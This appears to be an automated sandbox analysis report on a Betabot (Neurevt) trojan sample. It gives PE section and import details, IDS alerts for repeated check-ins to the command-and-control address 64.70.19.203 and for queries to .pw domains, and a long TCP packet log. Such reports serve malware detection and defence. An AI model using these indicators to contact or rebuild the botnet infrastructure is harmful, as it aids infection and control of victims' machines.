                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x18 | .rdata
                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                       Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                       .text | 0x1000 | 0x89e | 0xa00 | False | 0.629296875 | data | 5.893874453577146 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                       .rdata | 0x2000 | 0x1e6 | 0x200 | False | 0.3046875 | data | 2.345775184986294 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                       .rsrc | 0x3000 | 0x21564 | 0x21600 | False | 0.9925239934456929 | data | 7.938852680335222 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                       .reloc | 0x25000 | 0x36 | 0x200 | False | 0.072265625 | data | 0.3427863039007212 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                       Name | RVA | Size | Type | Language | Country
                       RT_BITMAP | 0x30ac | 0x21248 | data | |
                       RT_MANIFEST | 0x242f4 | 0x26e | ASCII text, with CRLF line terminators | English | United States
                       DLL | Import
                       KERNEL32.dll | ExitProcess, GetModuleHandleW, VirtualFreeEx, VirtualProtectEx, VirtualAllocEx
                       Language of compilation system | Country where language is spoken
                       English | United States
                       Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                       12/05/22-12:47:50.129126 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49701 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:48:05.503144 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49704 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:00.505069 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 50295 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:46:19.368387 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 58218 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:43.551273 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49700 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:52.321288 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 50902 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:58.149920 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 53555 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:04.219546 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:04.219546 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:24.377403 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:24.377403 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:48:00.735136 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49703 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:16.077326 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:37.686543 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:04.219546 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:50.129126 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49701 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:48:04.170104 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 54585 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:46:58.298151 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:37.686543 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:46:55.095514 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:14.828602 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 65323 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:08.104904 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 51441 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:21.944791 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:43.551273 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49700 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:43.551273 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49700 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:45.766359 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 58472 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:30.918196 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:46:58.298151 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:46:49.744933 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:20.714375 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 55039 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:37.686543 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:30.918196 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:12.620984 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:18.507456 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:39.883458 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 52688 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:33.137125 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 56263 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:55.956294 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49702 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:46:55.095514 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:48:05.503144 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49704 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:46:49.744933 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:50.129126 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49701 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:55.956294 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49702 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:48:01.952443 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49703 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:12.620984 | TCP | 2018784 | ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:26.631484 | UDP | 2016778 | ET DNS Query to a *.pw domain - Likely Hostile | 56682 | 53 | 192.168.2.5 | 8.8.8.8
                       12/05/22-12:47:12.620984 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:54.752098 | TCP | 2023765 | ET TROJAN Betabot Checkin 5 | 49702 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:47:18.507456 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       12/05/22-12:48:01.952443 | TCP | 2807970 | ETPRO TROJAN Win32/Neurevt.A/Betabot Checkin 3 | 49703 | 80 | 192.168.2.5 | 64.70.19.203
                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                       Dec 5, 2022 12:46:49.572079897 CET | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:49.744702101 CET | 80 | 49690 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:49.744813919 CET | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:49.744932890 CET | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:49.745218039 CET | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:49.917570114 CET | 80 | 49690 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:49.917643070 CET | 80 | 49690 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:49.917704105 CET | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:49.957252026 CET | 80 | 49690 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:51.917339087 CET | 80 | 49690 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:51.917474985 CET | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:52.922173023 CET | 49690 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:53.095259905 CET | 80 | 49690 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:54.924660921 CET | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:55.095139027 CET | 80 | 49692 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:55.095240116 CET | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:55.095514059 CET | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:55.095606089 CET | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:55.266019106 CET | 80 | 49692 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:55.266063929 CET | 80 | 49692 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:55.266133070 CET | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:55.305445910 CET | 80 | 49692 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:57.266345978 CET | 80 | 49692 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:57.271364927 CET | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:58.123863935 CET | 49692 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:58.125411987 CET | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:58.295351028 CET | 80 | 49692 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:58.297549009 CET | 80 | 49693 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:58.298115969 CET | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:58.298151016 CET | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:58.298513889 CET | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:58.470238924 CET | 80 | 49693 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:58.470284939 CET | 80 | 49693 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:46:58.470413923 CET | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:46:58.510446072 CET | 80 | 49693 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:00.471040010 CET | 80 | 49693 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:00.471113920 CET | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:01.565207958 CET | 49693 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:01.565963030 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:01.736680984 CET | 80 | 49693 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:01.737098932 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:01.737196922 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:01.737490892 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:01.737490892 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:01.909019947 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:01.909091949 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:01.909267902 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:01.948992968 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:02.958908081 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:02.959630966 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:03.130127907 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:03.130175114 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:03.130300045 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:03.171763897 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:04.219546080 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:04.219605923 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:04.390809059 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:04.390849113 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:04.544121981 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:04.544311047 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:06.546979904 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:06.547162056 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:09.211033106 CET | 49694 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:09.211504936 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:09.385176897 CET | 80 | 49694 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:09.385379076 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:09.385493994 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:09.385588884 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:09.385744095 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:09.556554079 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:09.556687117 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:09.799597025 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:09.799815893 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:11.178157091 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:11.178157091 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:11.349312067 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:11.349339008 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:11.349355936 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:11.349729061 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:12.620984077 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:12.621218920 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:12.792326927 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:12.792449951 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:12.831621885 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:14.792490005 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:14.792857885 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:15.904850960 CET | 49695 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:15.905292988 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:16.076464891 CET | 80 | 49695 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:16.076494932 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:16.076598883 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:16.077326059 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:16.077361107 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:16.248631001 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:16.248660088 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:16.248684883 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:16.248790026 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:17.283337116 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:17.283370972 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:17.454430103 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:17.454658031 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:17.495986938 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:18.507456064 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:18.507813931 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:18.678489923 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:18.678555965 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:18.678654909 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:18.718775988 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:20.678850889 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:20.680202961 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:21.771080971 CET | 49696 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:21.771768093 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:21.942322969 CET | 80 | 49696 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:21.944523096 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:21.944636106 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:21.944791079 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:21.945249081 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:22.117480993 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:22.117517948 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:22.117733955 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:22.157074928 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:23.158463001 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:23.158523083 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:23.331326962 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:23.331394911 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:23.331532001 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:23.378667116 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:24.377403021 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:24.377502918 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:24.550355911 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:24.550390005 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:24.599602938 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:24.601144075 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:26.599320889 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:26.600683928 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:27.690212011 CET | 49697 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:27.690952063 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:27.862132072 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:27.862449884 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:27.862853050 CET | 80 | 49697 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:27.881628036 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:27.881628036 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:28.052911997 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:28.052932024 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:28.057729006 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:28.093781948 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:29.304999113 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:29.304999113 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:29.476490974 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:29.476525068 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:29.759772062 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:29.760016918 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:30.918195963 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:30.918195963 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:31.099086046 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:31.099118948 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:31.099140882 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:31.099214077 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:33.099086046 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:33.099236012 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:34.250929117 CET | 49698 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:34.251444101 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:34.422483921 CET | 80 | 49698 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:34.422770977 CET | 80 | 49699 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:34.422990084 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:34.423048973 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:34.423048973 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:34.595274925 CET | 80 | 49699 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:34.595304966 CET | 80 | 49699 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:34.992084980 CET | 80 | 49699 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:34.993180037 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:36.042872906 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:36.042874098 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:36.474066019 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:36.645586014 CET | 80 | 49699 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:36.645634890 CET | 80 | 49699 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:36.645962000 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:37.686542988 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:37.686594963 CET | 49699 | 80 | 192.168.2.5 | 64.70.19.203
                       Dec 5, 2022 12:47:37.857892036 CET | 80 | 49699 | 64.70.19.203 | 192.168.2.5
                       Dec 5, 2022 12:47:37.857947111 CET | 80 | 49699 | 64.70.19.203 | 192.168.2.5
                      Dec 5, 2022 12:47:37.858175993 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:39.857206106 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:39.857304096 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:40.941499949 CET4969980192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:40.941994905 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.112682104 CET804969964.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:41.112859964 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:41.113059998 CET4970080192.168.2.564.70.19.203
